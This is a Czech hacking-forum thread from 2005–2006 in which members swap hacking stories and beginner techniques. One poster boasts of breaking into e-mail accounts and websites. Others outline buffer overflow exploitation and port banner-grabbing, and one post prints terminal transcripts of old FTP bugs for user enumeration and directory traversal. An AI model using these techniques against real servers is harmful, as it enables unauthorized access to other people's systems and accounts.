Trochu toho hacku

HackForum

Trochu toho hacku#
Tak se lidi pochlubte se svejma zazitkama. Uspesnej hack, neuspesnej hack me moc nezajima, ale kdyz ho pekne popisete tak proc ne :-). Piste o svejch programcich ktery pri utoku pouzivate atd.

A kdyz uz jsme u toho, kdo z vas nekdy zkousel delat portscanner v phpku? Ja ze bych se priucil me to totiz jede tak leda po lance. Pres net je to nepouzitelny.
(odpovědět)
lord Zealot.....12.12.2005 16:24
re: Trochu toho hacku#
muzes zacit prvni :D
(odpovědět)
hmm12.12.2005 19:54
re: Trochu toho hacku#
Ja nehackuju, jen si o tom rad ctu. Ja totiz nic neumim. :-)
(odpovědět)
lord..Zealot | Website12.12.2005 21:50
re: Trochu toho hacku#
no ja jsem zatim jen zacatecnik, ale nejakou tu uspesnou akci uz mam taky za sebou :) Emailu spousty, stranky asi ctvery. Sem tam nejaka ta kravina jako ucet na T-zones :))) Ale to fakt spis nahodou. Zato se to pekelne hodi, muzu si psat smsky zadara :)

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t12.12.2005 22:03
re: Trochu toho hacku#
nevim jaky inteligentni clovek by se prozrazoval a rikal co a jak a jaky pomocny soft pouzil. to je uplna blbost a prispevek je zcela zbytecny
(odpovědět)
bUgs12.12.2005 22:31
re: Trochu toho hacku#
No jak myslis bUgsi, ale v tom pripade muzes celej web poslat do odpadkovyho kose. Protoze nevim jaky inteligentni clovek by psal navody a clanky o hacku a prozrazoval by se tak a rikal jaky pouziva soft. :-)
(odpovědět)
lord..Zealot | Website12.12.2005 23:06
re: Trochu toho hacku#
NO tak znova, nechci aby sem kazdej psal - pouzil jsem wwwhack na adresu xxx@seznam.cz. Spis treba ty vole tudle sem cet o tyhle dire a fakt to kurva funguje. Zkusil sem si napsat takovejhle a takovejhle scriptik no a bylo to.


(odpovědět)
lord..Zealot | Website12.12.2005 23:08
re: Trochu toho hacku#
Podle mně jen Lamy čekají na to, až pravý hacker zveřejní svůj soft nebo až objeví exploit.

Proč nechcete být těmi pravými hackery? Např. popište jakým způsobem se hledají exploity.
Řekl bych že nejčastější chybou je buffer owerflow v C++ aplikacích, protože lidi jsou nepoučitelní (neuměji programovat), takže stačí popsat jak si vyhrát s Debuggerem a zjistit, které místo v paměti se přepisuje při vstupu delším než XXX znaků, stačí popsat jak napíšete XXX krát číslo 0 a zbytek vstupu bude tvořit assembler zapsaný pomocí ascii.
To, co nevím je : "Když vím o buffer owerflow, vím jak dlouhý vstup zadat a vím jaké příkazy asm do paměti připsat, jak si mám napsat program, který to tam nabouchá automaticky?"

Vůbec mně nemůže bavit zapsat tam cokoli ručně.

LIDI, POPIŠTE METODY PRAVÝCH HACKERŮ !!!
Nevychovávejte novou generaci Script-Kiddies a lamerů, kteří pouze parazitují na práci jiných !!!
(odpovědět)
--==[FReeZ]==--13.12.2005 2:06
re: Trochu toho hacku#
Já stebou souhlasim, ale jak se taková lama ná naučit "hecking"?
(odpovědět)
PetaBlesk25.1.2006 19:52
re: Trochu toho hacku#
No jo - tak to tady teda smazte :-D
(odpovědět)
lord..Zealot | Website13.12.2005 8:45
re: Trochu toho hacku#
To --==[FReeZ]==--: Rucne se to (z vetsi casti) nedela, vyuzivaji se skripty, ktery si predem napises, nejcasteji v perlu. Takze pokud chces psat vlastni exploity, nebo si zkusit buffer owerflow, nauc se programovat v perlu a kup si napr. knihu "HACKING Umeni exploitace".
(odpovědět)
Emkei | E-mail | Website | PGP13.12.2005 10:14
re: Trochu toho hacku#
Díky za radu, podívám se po knížce a budu zjisťovat jak moc by stálo za to, učit se v Perlu.
(odpovědět)
--==[FReeZ]==--14.12.2005 0:46
re: Trochu toho hacku#
lord..Zealot: co konkretne chces navod jak nabourat se do nejakeho mailu? potrebujes vytahnout DB centrum.cz ? nebo chces nekomu nahodit na stranku nejaky pekny img 404 a ve skole rict kamosovi hele kua vcera jsem se tak trochu hral na netu a shocil jsem nejakemu cepovi weba :o) ???

napis presne co ocekavas a jake chces navody?
(odpovědět)
bUgs13.12.2005 11:34
re: Trochu toho hacku#
nevim jak lorda Z.,ale me by treba zajimalo, nebo spis bych chtel vysvetlit jak treba vyuziju toho ze tenhle server ma otevreny tyhle porty,nebo kdyz mam sftp pristup tak jestli nejakou fintou nejde zlepsit si prava nebo udelat z toho ssh pristum,precet sem par manualu k ssh,sendmailu,samba ale moc chytrejsi nejsem,,a tady na webu najdu mozna tak nawod na to jak pouzivat netbus..sem lama,vim to..
(odpovědět)
child13.12.2005 22:14
re: Trochu toho hacku#
ad 1: Kdyz ma server otevrene nektere porty, hacker se na ne pripoji (anonymne) a napise napr. prikaz HEAD / HTTP/1.0 (2x ENTER), cimz se mu aplikace naslouchajici na danem portu predstavi a sdeli mu i svoji verzi (zjednodusene receno, existuji i fake-hlavicky), nebo vyuzije nejaky zautomatizovany program urceny k tomuto ucelu. Nasledne si sezene exploit pro tuto verzi, nebo jeste lepe, pokud danou aplikaci testoval doma a narazil na nejakou chybu, napise si vlastni exploit a doufa, ze jiz neni zazaplatovana.
ad 2: smtp pristup se da vyuzit k zjisteni uzivatelskych uctu na vzdalenym stroji, zneuzit exploitem, ale nikdy z nej neudelas ssh pristup.
Jinak na porty vyzadujici autentizaci muzes mj. nasadit treba cracker. Driv bylo dokonce mozne diky otevrenemu smtp portu vytvorit na Linuxovem stroji uzivatelsky ucet, dnes jiz samozrejme davno ne.
(odpovědět)
Emkei | E-mail | Website | PGP13.12.2005 23:50
re: Trochu toho hacku#
dik moc,kdyby tohle byl normalni clanek myslim ze by to spousta lidi jako ja ocenila..

akorat sem psal ne smtp pristup ale sftp,ftp se ssl,ale stejne moc dik.
(odpovědět)
child14.12.2005 21:20
re: Trochu toho hacku#
sry za zamenu sftp za smtp, kazdopadne plati to same, ssh pristup z nej neudelas. Jedine, co je u SSL/TLS pristupu komplikovanejsi, je ziskavani tech zminovanych hlavicek, musis si nejprve vytvorit tunel napr. pomoci programu 'sslproxy' a teprve nasledne se na dany port pripojit ...
(odpovědět)
Emkei | E-mail | Website | PGP15.12.2005 2:03
re: Trochu toho hacku#
emkei: no to nemas tak uplne pravdu. Prez ftpko se obcas daj delat hodne zajimavy veci.

overovani existence usera
nc vulnerable.host 21
220 gsmms0 FTP server (SunOS 5.6) ready.
cwd ~netadm
530 Please login with USER and PASS.
cwd ~xyz
530 Please login with USER and PASS.
550 Unknown user name after ~

prochazeni adresarove struktury
C:\>ftp localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (server:(none)): CoolICE
331 Password required for CoolICE.
Password:
230 User CoolICE logged in.
ftp> get /winnt/system.ini
200 Port command successful.
150 Opening data connection for /winnt/system.ini.
226 File sent ok
ftp: 227 bytes received in 0.01Seconds 22.70Kbytes/sec
ftp>
--------------------------
C:\>ftp -d localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (Server:(none)): anonymous
---> USER anonymous
331 Password required for anonymous.
Password:
---> PASS CoolICE_at_China.com
230 User anonymous logged in.
ftp> pwd
---> XPWD
257 "/C:/inetpub/ftproot/" is current directory.
ftp> cd /
---> CWD /
501 CWD failed. No permission
---> CWD ..
501 CWD failed. No permission
ftp> cd ...
---> CWD ...
250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory.
ftp> cd /
---> CWD /
501 Cannot accept relative path using dot notation
ftp> pwd
---> XPWD
257 "/C:/" is current directory.

Samozrejme tohle sou ukazky archaickejch chyb. Staci si hodit do guglu CWD bug.
(odpovědět)
dfg17.12.2005 2:40
re: Trochu toho hacku#
thx, to jsem naznal ...
(odpovědět)
Emkei | E-mail | Website | PGP18.12.2005 21:08
re: Trochu toho hacku#
wow. vo tom napsat user text, tak vyhravas kamo ;)
(odpovědět)
dayvee | Website | ICQ 26899873326.1.2006 22:58

Zpět
 
 
 

 
BBCode